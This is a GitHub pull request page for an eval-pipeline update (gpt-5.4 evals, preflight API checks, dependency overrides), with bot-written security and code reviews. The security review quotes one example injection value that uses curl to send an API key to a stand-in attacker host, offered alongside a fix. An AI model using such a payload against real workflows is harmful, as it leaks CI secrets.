Skip to content

feat: replace gpt-4.1 with gpt-5.4 evals, add preflight checks#1158

Merged
stack72 merged 5 commits intomainfrom
workflow-gpt-5.4
Apr 10, 2026
Merged

feat: replace gpt-4.1 with gpt-5.4 evals, add preflight checks#1158
stack72 merged 5 commits intomainfrom
workflow-gpt-5.4

Conversation

@stack72
Copy link
Copy Markdown
Contributor

@stack72 stack72 commented Apr 10, 2026

Summary

  • Replace gpt-4.1 with gpt-5.4 in multi-model skill trigger eval pipeline (openai:gpt-5.4)
  • Add preflight API check that makes a single API call before launching 202 eval requests — catches billing/credit issues immediately instead of retrying for hours
  • Fix Gemini eval assertions to handle Google's functionCall response format (was causing 36% pass rate → 93% after fix)
  • Fix critical security vulnerabilities (axios SSRF, basic-ftp command injection) in promptfoo dependencies via overrides
  • Gitignore generated promptfooconfig.yaml — it's regenerated every eval run
  • Add --allow-net to deno task for preflight fetch call

Local test results:

Model Pass rate Cost
gpt-5.4 97.5% (197/202) $0.83
gemini-2.5-pro 93.1% (188/202) $0.56

Test plan

  • Verified preflight check catches missing/invalid API keys immediately
  • Verified gpt-5.4 evals pass locally at 97.5% (above 90% threshold)
  • Verified gemini-2.5-pro evals pass locally at 93.1% (above 90% threshold)
  • Verified npm audit shows 0 vulnerabilities after overrides
  • CI run on this branch should pass

🤖 Generated with Claude Code

stack72 and others added 5 commits April 9, 2026 18:22
Drop concurrency to 1 and add 5s delay between requests for the
gpt-5.4 provider to stay within OpenAI rate limits.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
The provider was set to openai:gpt-5 which doesn't exist, causing 429s.
Restore concurrency to 5 with a small delay since the account has 5,000 RPM.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Concurrency 5 still hits 429s despite 5,000 RPM limit — promptfoo's
burst pattern overwhelms the rate limiter. Serial execution with
500ms delay should be reliable.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
- Add preflight check that makes a single API call before launching
  202 eval requests, catching billing/credit issues immediately
  instead of retrying for hours
- Add --allow-net to deno task for the preflight fetch call
- Override axios (>=1.15.0) and basic-ftp (>=5.2.1) to fix critical
  SSRF and command injection vulnerabilities in promptfoo dependencies

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Copy link
Copy Markdown

@github-actions github-actions bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

CI Security Review

Critical / High

None.

Medium

  1. .github/workflows/multi-model-eval.yml:36 — Expression injection in workflow_dispatch input (pre-existing, not introduced by this PR)

    • MODELS="${{ github.event.inputs.models || 'all' }}" interpolates the models input directly into a run: block. A repo collaborator could supply a value like $(curl attacker.com/?k=$ANTHROPIC_API_KEY) via the workflow dispatch UI, and the shell would execute the command substitution.
    • Mitigating factor: workflow_dispatch can only be triggered by users with write access to the repository, who already have access to repo secrets. Practical exploitability is low.
    • Fix: Pass the input via an environment variable instead:
      env:
        MODELS_INPUT: ${{ github.event.inputs.models || 'all' }}
      run: |
        if [ "$MODELS_INPUT" = "all" ] || echo ",$MODELS_INPUT," | grep -q ",${{ matrix.model }},"; then
      (Note: matrix.model is safe since it comes from the hardcoded matrix definition.)
  2. .github/workflows/multi-model-eval.yml:49denoland/setup-deno@v2 not pinned to SHA (pre-existing)

    • Per supply chain best practices, third-party actions should be pinned to a full commit SHA. A tag can be moved to point to different code.
    • Mitigating factor: denoland is the official Deno publisher and is generally trusted. The job only has contents: read permissions, limiting blast radius.

Low

None.

Verdict

PASS — The actual changes in this PR are security-neutral: updating a model name (gpt-4.1gpt-5.4), reducing concurrency, adding a preflight API check, adding functionCall response format handling in eval assertions, and gitignoring a generated config file. No new security issues are introduced. The two medium findings are pre-existing.

Copy link
Copy Markdown

@github-actions github-actions bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Code Review

Blocking Issues

None.

Suggestions

  1. Stale doc comment in generate_config.ts:28 — The usage comment still references gpt-4.1:

    * Supported model aliases: sonnet, opus, gpt-4.1, gemini-2.5-pro
    

    Should be updated to gpt-5.4.

  2. Unscoped --allow-net in deno.json — The other tasks scope their network permissions (e.g., --allow-net=api.osv.dev). Since only the preflight fetch() call needs Deno network access (subprocesses like npm/npx bypass Deno permissions), this could be scoped to --allow-net=api.anthropic.com,api.openai.com,generativelanguage.googleapis.com for defense-in-depth. Low priority since this is a dev/CI-only task.

  3. buildPreflightRequest is unit-testable — It's a pure function mapping model names to request configs. There's no existing test convention in scripts/, so this is just a nice-to-have observation for future hardening.

Overall

Clean PR. The preflight check with AbortSignal.timeout(15_000) is good practice and follows the project's "no fire-and-forget promises" convention. The Gemini functionCall?.name fix correctly handles Google's tool-call response format. Security dependency overrides for axios SSRF and basic-ftp command injection are appropriate. Removing the generated 3K-line YAML from version control and gitignoring it is good hygiene.

@stack72 stack72 merged commit 9531f6f into main Apr 10, 2026
11 checks passed
@stack72 stack72 deleted the workflow-gpt-5.4 branch April 10, 2026 10:42
stack72 added a commit that referenced this pull request Apr 11, 2026
Bump promptfoo from 0.121.3 → 0.121.4 and regenerate the lockfile. The
new release naturally pulls patched versions of every transitive dep
that was previously pinned via an override, so the entire `overrides`
block can go.

Clears 4 open Dependabot alerts against
`evals/promptfoo/package-lock.json`:

| # | Package | GHSA | Severity |
|---|---|---|---|
| 11 | mathjs | GHSA-jvff-x2qm-6286 | high |
| 10 | basic-ftp | GHSA-6v7q-wjvx-w8wg | high |
| 9 | axios | GHSA-3p68-rc4w-qgx5 | critical |
| 8 | basic-ftp | GHSA-chqc-8p9q-pq6q | high |

Root cause: #1158 added `axios` and `basic-ftp` overrides but the
lockfile was never regenerated, so the committed lockfile still had
`axios@1.14.0` and `basic-ftp@5.2.0`. The `basic-ftp: >=5.2.1` range
also still allowed the vulnerable 5.2.1 per alert #10, and there was
no override at all for mathjs.

Resolved versions in the regenerated lockfile:

| Package | Was | Now |
|---|---|---|
| @anthropic-ai/sdk | 0.81.0 | 0.82.0 |
| axios | 1.14.0 | 1.15.0 |
| basic-ftp | 5.2.0 | 5.2.2 |
| mathjs | 15.1.1 | 15.2.0 |
| hono | 4.12.12 | 4.12.12 |
| @hono/node-server | 1.19.13 | 1.19.13 |

No nested/duplicate copies of axios, basic-ftp, or mathjs remain in
the lockfile.

Verification:
- `npm audit` → 0 vulnerabilities
- `deno run scripts/audit_deps.ts` → "No known vulnerabilities found"
  (scanned 1064 packages across deno.lock + promptfoo lockfile)
- `deno fmt --check`, `deno lint`, `deno check` — clean

No code changes required. The eval entry script calls `npx promptfoo
eval` — a stable CLI surface — and a patch bump (0.121.3 → 0.121.4)
is not expected to change it. Engine requirement unchanged
(`^20.20.0 || >=22.22.0`); CI uses Node 24.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant